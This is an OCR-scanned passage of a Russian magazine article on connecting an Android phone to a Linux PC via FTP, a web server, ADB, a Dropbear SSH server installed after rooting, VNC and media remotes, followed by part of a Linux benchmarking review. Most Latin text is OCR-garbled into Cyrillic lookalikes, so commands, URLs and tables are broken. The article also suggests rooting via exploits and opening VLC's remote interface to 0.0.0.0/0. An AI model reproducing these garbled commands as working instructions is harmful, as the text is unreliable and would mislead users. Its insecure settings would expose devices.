девайсах (китайские «смартфоны»за $100 в расчет не берем). 

Однако из коробки делать такое Апбгоіб не умеет, поэтому придется 
отправиться на поиски соответствующего софта. 



► 092 
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^ Л\\ с Ф 20:37 


Разработка | 


Отладка по 115В 

Включить режим отладки при 
подключении к компьютеру по У ЗВ 


✓ 


□еЬи§ оѵег 115В опіу 

Ооп'і епзЫе йеОи^іпл оѵег ѴѴі*П 


Ѳ 


Уведомление отладки по 

Показывать уведомление отладки по 
1138 при подключении 




Оставить включенным 


□ 


Со ар ери я Зарядки экран будет всегда 

включен 


Фиктивные местоположс 


1 1 


Разрешить использование 
фиктивных местоположений 


и 


Закрытие приложений 

Долгое нажатие кнопки Назад 
закроет все запущенные 
приложения 


□ 


Имя хоста устройства 

ГѴ^Г^РН г. 1 Ъ 1 К 1 лЕ К Г.Т 0 гі 


ѳ 



Включаем АОВ 



Итак, претендент номер один — РТРЗегѵег. 

РТРЗегѵег — это настоящий РТР-сервер с открытым ис- 
ходным кодом, который можно использовать для сетевого 
расшаривания файлов 50-карты. Пользоваться програм- 
мой проще простого: скачиваем через маркет, запускаем, 
заполняем поля ІІзегіРТР-пользователь), Разз (пароль для 
входа), Рогі (любой выше 1 024, например, 1 234), Оебаиіі; сііг 
(дефолтовый каталог, здесь нужно указать /зсісагсі или/пппі;/ 
зсісагсі), ставим галочку напротив Апу ІМеІѵѵогк и нажимаем 
кнопку«5аѵеапсІ РезІагіЗегѵісе». После этого появится 
пока еще пустое окно со списком клиентов, в заголовке ко- 
торого будет у казан текущий ІР-адрес и порт РТР-сервера. 
Их надо скормить РТР-клиенту, например, стандартному/ 
изг/ЬіпЛір или тс. Преимуществотакого подхода втом, что 
сам по себе сервер почти не потребляет ресурсов, поэтому 
его можно держать включенным всегда. Однако это всего 
лишь РТР-сервер, со всеми его проблемами безопасности, 
ограничениями и неудобством использования. Идеальным 
вариантом здесьбыл бы 5РТР, но 58Н-сервер для АпбгоісІ 
нетакпросто установить (тем не менее в следующем раз- 
деле я расскажу, какэто сделать), поэтому мы обратим свой 
взор в другую сторону — на веб-сервер ѴѴеЬЗбагіпд. 
ѴѴеЬВбагіпдиіе — это бесплатная версия одноименного 
НТТР-сервера, разрабатываемого компанией ЫехіАрр. 
После подключения к серверу с помощью любого 
браузера ты получишь доступ кудобному интерфейсу, 
позволяющему закачивать и сливать файлы с устрой- 
ства, проверять статус устройства (уровень заряда 
батареи и сигнала ѴѴІ-Рі, использование карты памяти и 



V Ф НІІ й Ф 20:36 




ѴѴеЬ5Нагіп§ І5 асііѵе, 

Соппес^а № ѴѴІ-РІ п«ѵѵогк і зі 3. 

ѴІ5ІІ 

ПЩ:/П 92. 168.0.1 00:21 12/ 

іп уош сотриіег'5 Огоміег, 

Рог оѵѵпег эссезз, егнег раззѵтоггі: 

Ьѵѵѵѵѵі 







ѴѴеЬЗІіагіпд 

процессора). Платная версия плюс ко всему этому имеет 
встроенный музыкальный и видеоплееры, просмотрщик 
фотографий, позволяет настроить гостевой доступ, а 
также снимает ограничение на одновременную переда - 
чутолько одного файла (это, наверное, главный стимул 
ее купить). 

Настроить сервер предельно просто. Запускаем приложе- 
ние и нажимаем кнопку «Зіагі» в левом нижнем углу. По- 
сле этого на экране появится ІР-адрес устройства, порти 
пароль для доступа кданным, которые необходимо вбить 
в браузер. Поумолчанию ѴѴеЬЗбагіпд работаеттолько 
через ѴѴі-РІ, но это ограничение можно снять через окно 
настроек («Мепи -> БеШпдз -> Ыеіѵѵогк Зеиіпдз Сеііиіаг 
ассезз»). Там же можно настроить отправку оповещения 
по почте при каждом подключении кустройству. 

Управляем телефоном 

Апбгоіб оснащен довольно мощным средством управления 
под названием АйВ (Апбгоіб ОеЬид Вгісіде). Это протокол 
для манипуляции и отладки устройства с персонального 
компьютера, клиент для которого входит в стандартную 
поставку Апбгоіб 5йК (но его можно скачать и отдельно с 
са йта хба-беѵеіорегз.сопп ) . 

С помощью АйВ можно произвести такие действия, как 
копирование файлов во внутреннюю память устройства, 
синхронизировать каталоги слокальной машиной, по- 
лучить збеИ-доступ, просматривать журнал отладочных 
сообщений, устанавливать и удалять приложения, а также 
делать многие другие низкоуровневые вещи. 




РТРЗегѵег 




• Для Апбгоіб есть 
официальный 
ОгорЬох-клиент, 

с помощью кото- 
рого очень удобно 
синхронизировать 
файлы между компом 
и устройством. 

• Одно из главных 
достоинств АОВ в 
том, что реализация 
этого протокола в 
телефоне фактически 
не зависит от самого 
Апбгоіб. С помощью 
АОВ можно управлять 
телефоном даже в 
том случае, если тот 
находится в загрузоч- 
ном меню. 

• Любое приложение 
из этого обзора мож- 
но легко установить, 
просто отсканировав 
их ОВ-коды с по- 
мощью приложения 
Вагсобе Зсаппег. 
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ІЛМІХОЮ 




Поднимаем 55Н-сервер 




/пппі/зсісагсі 



□ Кезігісі ассезз іо сІеІаиЕг сі Іг зпгі 
5иЬйі^есіогІе& 



\А/акеир оп соттапсі 



Ке^ге$Ь тесііа аЛег ігапаГег 



АІЗоѴ.'ОСІ СОППЕСІІОП5 

ЗС соппесііоп 



Чтобы АйВ заработал, необходимо разрешить его использование 
в настройкахтелефона («Настройки Приложения -> Разработка 
-> Отладка по 115В»), После этого можно подключить устройство к 
компу с помощью тісго- 118В- шнура и запустить Ай В в режиме поис- 
ка устройств: 

$ . /асІЬ сіеѵісез 

016804110602С024 сіеѵісе 

Если на экране появится строка, похожая на эту, значит, все ок, и можно 
приступать к извратам над устройством. Наиболее важная команда 
в этом процессе — это асІЬзЬеИ, которая открывает зЬеН-доступ к 
устройству, то есть к стандартной (ноурезанной) командной строке Ыпих. 
Здесь работают все те же РОЗІХ-команды ісі, Із, рз ит.д. Однако общее 
количество доступных команд очень мало, и среди них нет действитель- 
но важных системных инструментов, как, впрочем, и бинарника /Ьіп/ 
зи, без которого нельзя получить права гооі (это значит, что для записи/ 
изменения будет доступна только 50-карта). Чтобы получить полный 
гооі-доступ, придется взламывать защитуустройства и устанавливать 
полноценный ЬизуЬох, однако эта тем а заслуживает отдельной статьи, 
и здесь мы ее рассматривать не будем. Скажутолько, что сегодня боль- 
шинство популярных моделей телефонов можно поломать с помощью 
простой в использовании программы ЗирегОпеСІіск ( гЬогКизе.огд . 
можно за пустить в Ыпих с помощью команды топо ЗирегОпеСІіск.ехе). 
Другая полезная для нас возможность АРВ, это безвопросная установ- 
ка приложений прямо сжесткого диска компа. Просто незаменимая 
фича в том случае, если требуется установить большое количество 
скачанных из интернета приложений одним махом. Для этого достаточ- 
но выполнить одну простую команду: 

$ -Рог арк іп *.арк; сіо ./асІЬ іп5І:а11 $арк; сіопе 
АОВ удобно использовать для заливки файлов на устройство: 

$ . /асІЬ ризЬ файл_или_каталог /каталог/на/устройстве 

И сливать с него: 

$ . /асІЬ риіі /каталог/или/файл/на/устройстве каталог 

Плюстакого подхода в том, что он нетребует монтирования устройства 
в качестве флешки, поэтому сразу после подключения смартфона к 
компу можно начать работу с файлами. Особенно удобна в этом случае 
команда асІЬ зупс, позволяющая синхронизировать каталог на жестком 
диске компа с каталогом на устройстве: 

$ ./асІЬ зупс /путь/до/каталога/путь/до/каталога/ 

на/устройстве 

Скопированы будуттолькоте файлы, которые были изменены/добавле- 
ны в каталог на компе (своего рода бэкап). 

Также с помощью АОВ можно перезагрузить телефон в меню загрузчика 
(аналогвыключения и включения смарта с зажатой кнопкой уменьше- 
ния громкости): 

$ . /асІЬ пеЬоо1;-Ьоо1:1оасІег 

Всеэти функции АОВ невероятноудобны, ноопятьжеограничены 
кабелем, который так или иначе придется втыкать в комп даже в том 
случае, если требуется скинуть всего один файл или выполнить простую 
команду. Ксчастью, на этот счету разработчиков АпбгоісІ есть вполне 
очевидный ответ — АОВ может работать по сети. Поумолчанию эта 
функция отключена в настройкахтелефона, ктомуже в целях безопас- 
ности она работает только в ѴѴі-Рі-сетях, но если тебя это не останав- 
ливает, тогда иди в меню и снимай галочку напротив пункта «ОеЬид 
оѵегІІЗВ оп1у»(«Меню -^Приложения -> Разработка -> ОеЬид оѵег 
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ІІЗВ опіу»). После этого телефон начнет слушать АйВ- 
подключения на порту 5555 (узнать текущий ІР-адрес мож- 
нотак: «Меню -> Беспроводные сети -> Настройки ѴѴі-РІ -> 
Кнопка «Меню» -> Дополнительные функции-> ІР-адрес»]. 
Далее можно законнектитьАОВ ктелефону: 

$ ./асІЬ соппесі: ІР-адрес 

После этого следует проверить подключение: 

$ ./асІЬ сіеѵісез 

192.168.0.100:5555 сіеѵісе 

И начать работать с телефоном также, каки при проводном 
подключении, втом числе получить доступ кзбеіі Однако 
эту функцию гораздо лучше выполняет ЗЗН-сервер. 

55Н — наше все 

Внутри, под толстым слоем баѵа-библиотек и красочных 
графических интерфейсов, Апбгоіб остается все той же 
Ыпих-системой, которая имеет некоторые ограничения 
и несовместимости, но в большинстве своем следует 
стандарту Р05ІХ. Это значит, что для нее можно собрать 
практически любой консольный І_іпих-софт, включая все- 
ми нами любимый 55Н -сервер, а точнее — его легковесную 
реинкарнацию под названием ОгорЬеаг.Такмы сможем не 
только подключаться кустройству с помощью стандартного 
ЗЗН-клиента, но и получать доступ кфайлам на Зй-карте 
посредством протокола 5РТР, поддержка которого есть в 
большинстве менеджеров файлов для І_іпих. 

Есть несколько способов установить ОгорЬеаг в 
Апбгоіб, самый простой из которых — скачать или ку- 
пить ЗЗНОгоісІ в Апбгоіб Магкеі за один евро и наслаж- 
даться результатом. Однако если ты не хочешь замо- 
рачиваться с виртуальными кредитными картами или 
платить за открытый софт (ОгорЬеаг все-таки чистый 



Ореп Зоигсе), тогда можно пойти и по более трудному, 
но надежному пути, который предполагает вшивание 
53Н -сервера прямо в системный раздел Апбгоіб, так 
что ему не будет страшен даже «Сброс до заводских на- 
строек». Для этого нужно выполнить всего три условия: 

1 . Зарутитьтелефон с помощью эксплоитов, опубли- 
кованных на хба-беѵеіорегз.сот . или софтинтипа 
ЗирегОпеСІіск или 24 гооі ( доо.д[/Вѵ7і:х . работаетпрямо в 
Апбгоіб). 

2. Установить ВизуВох из маркета (например, с помощью 
«ВизуВох Іпзіаііег»). Этот шаг можно пропустить, если гооі 
был получен с помощью ЗирегОпеСІіск. 

3. Залить на устройство сам ОгорЬеаг: 

$ м§е1: Іі1:1:р://дІіиІ5І:.сот/сІгорЬеап.1:аг.§2 
$ 1:аг -Х 2 -Р сІгорЬеаг .1:аг .§2 
$ . /асІЬ ризИ ~/сІгорЬеаг /зсісагсі 
$ ./асІЬ зЬеІІ 

> зи 

> тоипі: -о гетоштЩ гм /зузііет 

> ср /зсІсагсІ/сІгорЬеагѴ* /5у5І:ет/хЬіп 

> сЬтосІ +х /зу5І:ет/хЬіп/сІпорЬеаг /5у5І:ет/хЬіп/ 
сІгорЬеагкеу 

> тксііг /сІаІіа/сІгорЬеаг 

> сІгорЬеагкеу -1: гза --Р /Ьа1:а/сІгорЬеаг/сІпорЬеаг_ 
г5а_Ьоз1:_кеу 

> сІгорЬеагкеу -1: сізз --Р /Ьа1:а/сІгорЬеаг/сІгорЬеаг_ 
сІ55_Ьо5І:_кеу 

Это все, теперь можно было бы запустить ОгорЬеагс по- 
мощью одноименной команды, однако я бы порекомендо- 
вал использовать для этого более удобную графическую 
оболочку ЗЗЕЮгоіб. 

ОгоісіЗЗНсІ ( собе.доодіе.сот/р/б тісІзгИсІ/ ) — это обертка 
вокруг ОгорЬеагс открытым исходным кодом, котораятак- 
же входит в состав СуаподепМоб 7.1 . С помощью ОгоібЗЗНб 
легко нетолько поднятьЗЗН-сервер наустройстве, но и 
настроить та кие параметры, как метод аутентификации, 
изменить дефолтовый пароль (с помощью консоли это сде- 
лать нетак просто, как кажется на первый взгляд) и другие 
параметры сервера. 

При первом запуске приложение попросит согласиться 
с генерацией начальных настроек, затем откроетэкран 
настроек, наиболее важные для нас параметры кото- 
рого скрыты в пункте Зегѵісе апб АиіЬепббсаііоп. Здесь 
можно изменитьдефолтовый пароль (поумолчанию стоит 
«раззѵѵогб»), добавить публичные ключи клиентов (сЗО- 
ка рты ) , а та кже указать п рослуш и ва ем ы й п о рт (ТС Р рогі Іо 
Іізіеп, поумолчанию 2222) и заставить сервер загружаться 
во время инициализации ОС (Зіагі оп Ьооі). 

Обрати внимание, что поумолчанию сервер запускается 
с правами обычного пользователя (что правильно), но в 
случае необходимости это можно изменить в соседнем 
меню«Зу5Іет зеШпдз -> Пип баетоп аз гооі». Когда все 
настройки будут сделаны, можно нажать кнопку«Назад» и 
на появившемся экране — «Зіагі». Текущий ІР-адрес, а так- 
же логин и пароль будутуказаны там же. После этого можно 
подключаться кустройству с помощью любого ЗЗН-клиента, 
например, стандартного ззб: 

$ 55Іі апбгоіб@192. 168. 0.100:2222 

Достучаться до компа 

Выполнить обратное подключение (устройство — комп) 
с помощью Апбгоіб гораздо проще. В маркете есть масса 
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разнообразныхББН-клиентов, лучшим (и ктомуже бес- 
платным) из которых является СоппесіВоТ Этот 55Н- клиент 
обладает массой настроек, поддерживает по чти все функ- 
ции 55Н и ктомуже проств использовании. Чтобы сего 
помощью подключиться ксвоей домашней машине, просто 
запусти приложение, согласисьслицензией (Арасбе 
Ысепзе 2.0, кстати), несколько раз нажми кнопку «Далее» 
(хотя описанныехинты можно и почитать) и вбей в окне 
ввода имя удаленного пользователя и хоста в формате 55Н. 
После этого соединение будет установлено, и ты сможешь 
рулить компом, какзахочешь. Проблема СоппесШоІ только 
в том, что он не имеет механизма запоминания или бы- 
строго выполнения часто используемых команд, а без этого 
управляться с ним довольнотяжело. Однако и эту проблему 
можно решить сразу несколькими способами. Во-первых, 
никто незапрещаетнам писать скрипты/алиасы и называть 
их простыми двухбуквенными именами (например, «рх» 

— «ріпд хакер. ги»), а во-вторых для решения этой задачи 
в АпсІгоісІ есть приложение БагіегОеек. БагіегОеек — это 
простая бесплатная программа для быстрого выполнения 
часто используемых команде помощью клика по кнопке. В 
отличие от других подобных софтин, доступных в маркете, 
этот помощник быстро стартует и имеет простой интерфейс, 
незагроможденный ненужными элементамиуправления. 
Чтобы начать пользоваться программой, достаточно за- 
пустить БагіегОеек, нажать кнопку «Меню» и заполнить 
появившуюся на экране форму: в поле ІЧате следует 
вписать имя удаленной машины, в поле Нозі — имя хоста 
или ІР, заполнить поля ІІзеги Раза. Ниже следует вписать 
имя команды, которое будет отображаться в списке, и саму 
команду. После этого нажимаем кнопку «Баѵе» и попадаем 
на главный экран приложения, где будут перечислены все 
забитые нами команды. Для выполнения любой из нихдо- 
статочно просто та пнуть по имени. 

Пульт дистанционного 
управления 

В маркете есть огромное количество самых разнообразных 
пультов для удаленного управления медиаплеером. Боль- 
шинство из нихтребуютустановки сервера, который будет 
обслуживать запросы клиентской программы, запускать 
необходимые приложения и отдавать им команды. Обычно 
реализация серверов есть только для ѴѴіпсІоѵѵз, ате из них, 
которые могут работать в Біпих, требуютустановки среды ис- 
полнения ^ѵа, что врядли понравится большинствулинук- 
соидов. Поэтому мы рассмотрим только те пульты, которые 
не требуютустановки каких-либо приложений на комп. 
Первый пульт, о котором я хотел бы поговорить, — 

ББНтоІе. Он позволяет рулить тріауе г, ѴІ_С, Атагок, 

КаТСеіп и многими другими плеерами с помощью команд, 
отсылаемых по протоколу 55Н, поэтому не требует не то, 
что сервера, а вообще чего быто ни было, кроме корректно 
работающего ББН-сервера. 

Использовать ББНтоІе довольно просто. После старта про- 
грамма предложитуказать данные ББН-сервера, выбрать 
медиаплеер из списка поддерживаемых из коробки (можно 
самому создать конфигурацию для других программ) и дать 
указанной конфигурации имя (например, «Ноте тріауег»). 
После чего на экране появится списокконфигураций, по 
кликуна одной из которых возникнетокно, в котором можно 
выбрать медиафайл. Послетого каквыбор будет сделан, 
появится интерфейсуправления плеером, в котором есть 
кнопки «Стоп/Пауза», «Перемотка», «Громкость» и т.д. 
ББНтоІе подкупаетсвоей универсальностью и простотой 
использования, однакоу него есть один существенный не- 
достаток: если ББН-соединение отвалится, получить доступ 



к уже запущенному плееру будет невозможно, и никакие 
зегееп и прочиеухищрениятут, по понятным причинам, не 
помогут. Поэтомутем, кто предпочитает использовать ѴІ_С, я 
бы порекомендовал обратитьсвой взор в сторону отлич- 
ного и полностью свободного ѴБС-клиента ѴБС-Петоіе (в 
маркете есть несколько приложений стаким названием, 
поэтому надо искать тот, который написан человеком по 
имени РеІегВаІсІѵѵіп). 

ѴІ_С Петоіе нетребуетустановки специального сервера, 
однако, чтобы он заработал, ѴІ_С следует за пустить с под- 
держкой встроенного НТТР-сервера. Сделать это можно с 
помощью следующей команды: 

$ ѵіс - - ех1:гаіп1:-р=1иаЫ:1:р ---РиНзсгееп \ 
--бТТр-аНэит-агТ - ^*-5*аг*-тіпітІ2есІ 

Однако, чтобы ѴІ_С пустил нас, требуется также добавить ІР 
телефона в списокразрешенных к подключению хостов: 

$ 511 -5 

# есбо '123.456 . 789 .012^ >> /и5г/5Ііаге/ѵ1с/1иа/ 

Іі**р/.Іі05*5 

В целяхтестирования можно использовать 0.0. 0.0/0 
вместо ІР-адреса, тогда доступ к интерфейсу удаленного 
управления получат все. После этого можно запустить 
клиент, нажать кнопку «Выброс» (сверху, рядом с изобра- 
жением обложки альбома), далее тапнуть по пункту меню 
«АсИ ѴІ_С зегѵег» и вписать ІР-адрес сервера в появив- 
шееся поле. Теперь можно добавлять файлы в плейлист(с 
помощью все той же кнопки), управлять воспроизведени- 
ем и т.д. Подобные приложения есть и для других медиа- 
плееров, например, Атагок2 Петоіе, Вапзбее Петоіе и 
туіМгоісІ для МуіЬТѴ. Все они доступны в маркете и абсо- 
лютно бесплатны. Также существует прекрасный клиент 
для многихТоггепІ-клиентов под названием ТгапзсІгоісІ. 

Он полностью открыт и бесплатен, однако недоступен в 
маркете, поэтому придется качать прямо с сайта разра- 
ботчика (ОР-код ведет именно туда). ТгапзсІгоісІ под- 
держивает почти все популярные Тоггепі-клиенты для 
Ыпих, методы настройки каждого из которых отличаются. 

Я не могу описать их все, поэтому остановлюсьтолько на 
самом популярном — Тгапзтіззіоп. Настроить удаленный 
доступ кТгапзтіззіоп довольно просто. Для этого следует 
зайти в меню «Правка Настройки» и перейти на раздел 
«ѴѴеЬ». Далее ставим галочку напротив опции «Включить 
ѵѵеЬ-клиент». Чтобы кто угодно не мог подключиться к 
программе, отмечаем опцию «Использовать аутентифи- 
кацию» и вбиваем имя и пароль. Теперьустанавливаем и 
запускаем ТгапзсІгоісІ, нажимаем «Открыть настройки», 
далее «Добавить новый сервер», вбиваем произвольное 
имя, выбираемтип сервера (Тгапзтіззіоп), набираем ІР- 
адрес, указываем п о рт 9 0 9 1 , отмечаем чекбокс « И споль- 
зовать авторизацию», вбиваем имя и пароль, возвраща- 
емся на главное окно приложения, где нас должен ждать 
интерфейсуправления. 

Рабочий стол туда и обратно 

Теперь поговорим отом, как получить доступ к рабочему 
столу компа со смартфона и обратно. Лучшее, что было 
когда-либо придумано программистами на этутему, это про- 
токол ѴЫС (в плане простоты реализации и распространен- 
ности он вне конкуренции). ѴЫС-клиенты и серверы есть 
для любой, даже самой экзотической ОС, втом числе для 
АпсІгоісІ и Ыпих. Один из самых простых и удобных АпбгоісІ- 
клиентов, это АпсІгоісІ ѴІ\І С Ѵіеѵѵег, доступный в маркете 
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ѴІ.С Ретоіе — просто и со вкусом 



сігоігі ѴГіСІ псгѵег 

сГгогсІ ѴЯС Бегѵег 
5ШІ Беі ѵег 
5іор Бегѵег 
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01 
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ѴЫС-сервер? Легко! 



абсолютно бесплатно. Чтобы на строить до ступ к рабочему 
столу компа с его помощью, нужно сделать следующее: 

1. Установить на машину ѴЫС-сервер: 

$ біісіо ар1:-§е1: Іпз1:а11 1:і§б1:ѵпс 

2. Создать конфигурационный файл -/.ѵпс/хзіагіир в своем 
домашнем каталоге, прописав в него следующие строки: 

$ ѵі ~/.ѵпс/х5І:аг1:ир 

хгсІЬ $НОМЕ/ .Хгевоигсез 
5І:аг1:ПихЬох & 

Во второй строке следует указать команду запуска менед- 
жера окон (например, зіагіксіе). 

3. Запустить сервер командой ѵпсзегѵег, дважды ввести 
пароль на доступ к рабочему столу и ввести «п» в ответ на 
последний вопрос. 

4. Запустить Апбгоіб ѴІ\ІС Ѵіеѵѵег, заполнив поля РаззѵѵогсІ 
(тот самый пароль), Аббгезз (ІР-адрес хоста), Рогі (здесь 
следуетуказать5901 вместо 5900) и выбрав пункт 24-ЬіІ 
соіог в списке Соіог Рогтаі, остальные поля можно оста- 
вить незаполненными. После нажатия кнопки «Соппесі» 
на экране появится рабочий стол с указа иным ранее 
оконным менеджером. 

Возможнатакже и обратная конфигурация, при которой на 
экране компа появляется рабочий стол смарта. Для этого 
на устройство необходимо установить ѴЫС-сервер бгоіб 
ѴІ\ІС зегѵег, запустить программу и нажать кнопку «51а гі 
Зегѵег». После чего к смартфону можно будет подключить- 
ся с помощью команды ѵпсѵіеѵѵег: 

$ ѵпсѵіемег ІР-адрес : 5901 

Для доступа можно использовать и браузер, изменив 
номер порта на 5801 . 



Вместо заключения 

В этой статье описана лишь часть приложений, способных 
соединить твою домашнюю машину со смартфоном на базе 
АпбгоісІ. На самом деле существуют сотни самых разноо- 
бразных софтин, которые могут быть полезны в этом деле. 
Упомянулишь некоторые из них: ѴѴібі кеубоагб, позво- 
ляющая использовать комп какудаленную клавиатуру; 
Сбготеіо Рбопе — официальное приложение боодіе 
для открытия ссылок из браузера Сбготе на телефоне; ІР 
ѴѴеЬсат, превращающая смартфон вѵѵеЬ-камеру; Петоіе 
ѴѴеЬ Оезкіор, сочетающая в себе функции многих рассмо- 
тренных в статье приложений; ЫадМопОгоіб, позволяю- 
щий мониторить сервер с установленным Ыадіоз; 2аЬЬіх 
оп Ібе до —удаленная 2аЬЬіх-консоль. т 
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!.Л Обзор утилит 
для тестирования 
производительности 



• Так сложилось, что под самую распространенную ОС полно 
всяких разных бенчмарков на любой вкус и кошелек: ЗіЗоН Запсіга, 
ЗОМагк, РСМагк и другие. Под піх’ы выбор поскромнее, но и этого 
вполне достаточно, чтобы покрыть все потребности. 



СРІІ 

Первое, что обычно описывают в конфигурации компа — СРІІ. Вотза него 
сначала и возьмемся. Один из эталонных процессорныхтестов под винду 
— ЗирегРі. Он есть и под Ыпих, но давно не развивается и не работает на 
современных дистрибутивах (про 64-битные ОС даже и не слышал). Зато 
в Ыпих есть функциональный аналоге нехитрым названием Рі. Ставим: 

# арі-§е1: іпзіаіі рі 

В отличие отвиндового аналога, Рі норовитвывести получившееся 
число на экран и самостоятельно не считает затраченное время. Поэтому 
запускаемтак: 

$ ііте рі 1048576 >/сІеѵ/пи11 | §гер геаі 

Такмы замеряем время, необходимое для вычисления числа Рі сточно- 
стьюдо 1048576 знаков после запятой. У моего ноута с I піеі Соге І5-2410М 
на это ушло От 1 .675з, а у рабочего компа с I піеі Соге І5-2300 — 0т0.137з. 
Несильно впечатляющая разница, учитывая, что на рабочем компе 
физических ядер в два раза больше, чем в ноуте. Объясняется это тем, что 
Рі (каки ЗирегРі) — однопоточный. В современных реалияхэто никуда 
не годится. Хороший вариантмногопоточного теста — встроенный в 7-і\р 
бенчмаркСРІІ (операция архивирования/разархивирования ложится, в 
основном, на процессор). Запускбенчмарка: 

$ 72 Ь 

Тест выполняется несколько раз для верности, по окончании будет вы- 
дано среднеезначение. Из интересной информации, которую бенчмарк 
нам сообщит: скорости архивирования/разархивирования в КВ/з, 
сколько он занял процессора во времятестирования (в процентах) и свой 
собственный рейтингв МІР5 (миллионы операций в секунду). В Сети 



обычно меряются именноэтими МІРЗ’ами (в Ыпих’овой версиитеста это 
строчка Тоі). 

I піеі Соге І5-2410М показал такие значения: 344, 2065, 7064. Первая циф- 
ра-утилизация процессора во время теста (в процентах), третья цифра 
— собственно, рейтингв МІРЗ’ах, а вторая — это рейтинг, поделенный на 
нагрузку (можно это грубо представить в качестве производительности 
одного ядра). 

Для сравнения цифры на Іпіеі Соге І5-2300 (соответственно): 357, 3049, 
10771. 

Модульный многопоточный инструментизмерения производительности 
зузЬепсб также предоставляет возможность прогнать тест СРІІ. Реализа- 
ция теста очень проста — вычисляются все простые числа доуказанного. 

$ зувЬепсІі --і:е5і:=сри --сри-тах-ргіте=2ѲѲѲѲ гип 

Самая интересная строчка, которой и можно меряться — последняя: 
сколько всего времени в секундах занял тест. РезультатСогеі5-2410М — 
30,9614, Соге І5-2300 - 27,8938. 

Есть также бенчмарки с 6111 — например, Ьагсііпіо. Основное назначение 
проги — вывод информации о компе в человекочитаемом виде. Кроме 
того она позволяет прогнать несколько тестов и сравнить результаттвое- 
го СРІІ с несколькими заранее забитыми значениями. Довольно удобно. 
Жаль, проектболыше не развивается. 

ОЗУ 

Обычно, когда говорятпро ОЗУ, упоминаюттолько ее объем, не касаясь 
пропускной способности. Пожалуй, самый простой способ протести- 
ровать пропускную способность ОЗУ в Ыпих— прога тбѵѵ(Метогу 
ВапсІѴѴісШз). Поставить ее несложно — есть в репозиториях большинства 
дистрибутивов. Принцип работы проги прост: в оперативке выделяются 
два массива данныхуказанного размера, а потом один из них копируется 
в другой. Тесты прогоняются несколько раз (поумолчанию — 10), после 
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Наверное, единственный ЬепсНтагк с ОІЛ 



Занимательная .статистика 
орепЬепсптагкіпд.огд. 



Проект был запущен 28 февраля 201 1 года на выставке ЗоиіЬегп Саіі- 
Іогпіа І_іпих Ехро. В середине июня подвели некоторую статистику: 

• было загружено 41258 результатов тестов; 

• насчитано 89,21 7 запусков РТ5 (отсчет велся по обращениям к 

орепЬепсЬтагкіпд.огд І: 

• собрана статистика по 32189 РСІ -устройствам и 16536 115В- 
устройствам; 

• обработано 325351 поисковых запросов пользователей. 

Самые популярные компоненты на момент написания статьи: 

• ОС — ОЬипіи 

• СРИ - Іпіеі 

• СРИ - ІЧѵісІіа 

• Производитель матплат — Азиз 

• ШИ — Ватзипд 

• Р5 — ех14 



чего вычисляется среднее значение. Думаю, проще всего сразу его от- 
фильтровать: 

$ тЬм 512 | §гер АѴС 

Здесь 51 2 — размер массива в Мб. Надо понимать, что реально для теста 
нужно в два раза больше свободной памяти. 

В результате выполнения этой команды мы получим три строчки — по 
одной для каждого проводимого тЬѵѵ-теста, где самое интересное — в 
последней колонке (собственно, пропускная способность). На ноутеу 
меня получились следующие цифры: 

АѴС Ме’ЫіосІ : МЕМСРѴ Сору: 2765.609 МіВ/з 
АѴС Ме’ЫіосІ : ЭІІМВ Сору: 4248.589 МіВ/з 
АѴеМе-ЫіосІ: МСВЮСК Сору: 11930.338 МіВ/з 

Ана рабочем компе: 

АѴеМе-ЫіосІ: МЕМСРѴСору: 5372.418 МіВ/з 
АѴС МеіІюсІ: 0№В Сору: 7563.436 МіВ/з 
АѴС Меііііосі : МСВЮСК Сору: 13755.269 МіВ/з 

Уже знакомый нам зузбепсіт тоже умееттестировать ОЗУ. 

$ зузЬепсІі --1;е5І:=тетогу гип 











■ і ; 1 г 1 1 - і'Ч і ■ 1 г 1 1 - 


1 ар 1 г-;і 


? Тг Ь 








М і* 1411 ! 


Ычі {-іуг'ір*,* 1 с] зті:і 


ХртГ 


ТШІ111 


№іЗіА *,» 


РѴ.УГР 


І.ЩТІЬ'^Л.Ии^-Г 


11 ифі 


■фп.1 (РЦ-іІ 


ш яге; 


Р5- "в, » СРи к*гФ^^е гНгеіИі * 






ИАН ш.лдр > 


Й" и И. г Опт Ніи і к. ІНг-глгіч.- 4 






ВІ.СІ 


(#*рі , *-яІ.і>д 






ІР44І •г '- ІМ 


н/д Р-іі іп ? | 


ум до 


я/д 


**У,пд 


Ч7/г 


> 


гсСЧ і чръ | 




нірі 


КП 


12 1 МЛГ 


лиг 


ІІП-І ООЛІ 1 


«уь*і лев 


ІѴР.» 


/5м 


?■?! 


ПЗ 


21Т* АААй | 


•І»І И? 


№» 




?А й4Ь» 




Ззм Л^ІІ | 


НИН 1«Г 


8П4І 


7711 


35 1 ЙЗЗІ 


531 


3315 7431 І 


13315 317 


ІЫТ 


?713 


А -,г: 


эй 


-29* 494-Г 


3*1 


1 'ИГ 




Гйі . 


зы 


лаге /лзз 










ирюр 


5 | 









Тест СРІІ с помощью архиватора 7-іір 



И опять самое интересное — это последняя строчка. 

На ноуте: 

ехесиііоп ііте (аѵ§) : 32.6897 

На рабочем компе: 

ехесиіііоп Іііте (аѵ§) : 29.8387 

Параметровтестирования ОЗУузузЬепсІт побольше, чем параметров 
тестирования СРІІ. По умолчанию тестируется операция записи. Тестиро- 
вание операции чтения будет выглядеть так: 

$ зузЬепсб --1:е5І:=тетогу --тетогу-орег=геасІ гип 

У меня этоттестзанял 20,0857 на ноуте и 1 9,5404 на компе. 

иоо 

ЬЮй в современных конфигурациях часто является узким местом. Пожа- 
луй, самый простой способузнатьего скорость — с помощью Ьбрагт: 

бсірагт -1: /сіеѵ/зсіа 

На ноуте 2,5" НОР с 5400РРМ выдает результат в 75,80 МВ/зес. 550 Іпіеі 
320 может похвастаться 222,93 МВ/зес. Тест выполняет простое последо- 
вательное чтение, поэтому не очень информативен. 

Болееточный, нотребующий чутьбольшего количества телодвижений 
инструмент для тестирования винта — зузбепсіт. Во-первых, он поддер- 
живает несколько режимовтестирования: 

• зецгсі — последовательное чтение; 

• зецѵѵг— последовательная запись; 

• зецгеѵѵг — последовательная перезапись; 

• гпбгб — случайное чтение; 

• гпбѵѵг — случайная запись; 

• гпбгѵѵ— комбинация случайных чтения и записи. 

Из всех этих режимов я выбрал последовательные и случайные чтение и 
запись. Допустим, для начала протестим последовательное чтение. Пре- 
жде чем за пустить тест, нужно сгенерить для него файлы: 

$ зузЬепсб --і:е5і:=б1еіо --61е-1:о1:а1-5І2е=10С \ 
--61е-іе5і-тосІе=5едгсІ ргераге 

Втекущем каталоге появится россыпь файлов с префиксом Іезі. Опция 
